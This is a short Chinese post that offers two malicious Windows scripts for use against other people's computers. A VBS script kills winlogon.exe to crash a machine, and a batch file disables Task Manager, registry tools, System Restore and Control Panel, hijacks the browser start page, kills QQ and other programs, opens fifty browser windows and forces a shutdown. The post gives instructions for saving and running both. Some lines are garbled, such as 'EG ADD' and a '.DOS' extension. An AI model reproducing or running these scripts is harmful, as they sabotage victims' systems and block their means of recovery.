在下面。。。
让被人电脑蓝屏 代码;Set ws = CreateObject("Wscript.Shell")
wscript.sleep 1200
ws.run "cmd /c start /min ntsd -c q -pn winlogon.exe 1>nul 2>nul",vbhide 【把这些代码复制到一个记事本然后另存为.vbs的后缀名,必须有个VBS】
这个是一个集合有很多功能可以让别人QQ掉代码是:@echo off
EG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v Disableregistrytools /t REG_DWORD /d 00000001 /f
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 00000001 /f
reg add hkey_current_user\software\microsoft\windows\currentversion\policies\explorer /v
restrictrun /t reg_dword /d 00000001 /f
reg add hkey_current_user\software\microsoft\windows\currentversion\policies\explorer /v
notraycontextmenu /t reg_dword /d 00000001 /f
reg add hkey_current_user\software\microsoft\windows\currentversion\policies\explorer /v noviewcontextmenu /t reg_dword /d 00000001 /f
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRestore /V DisableSR /t reg_dword /d 00000001 /f
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /V NoFolderOptions /t REG_dword /d 00000001 /f
reg add hkey_current_user\software\microsoft\windows\currentversion\policies\explorer /v nocontrolpanel /t reg_dword /d 00000001 /f
reg add "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main" /v "Start Page" /t reg_sz /d
http://www.4399.com/ /f
reg add "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main" /v "Default_Page_URL" /t reg_sz /d
http://www.4399.com/ /f
taskkill /f /im thunder.exe
taskkill /f /im QQ.exe
taskkill /f /im QQMusic.exe
taskkill /f /im QQLive.exe
taskkill /f /im Stormtray.exe
taskkill /f /im QvodTerminal.exe
taskkill /f /im QvodPlayer.exe
taskkill /f /im SogouInput.exe
taskkill /f /im iexplore.exe
for /l %%i in (1,1,50) do start IEXPLORE.EXE
Shutdown -s -t 60 【这个是另存为.DOS的后缀名】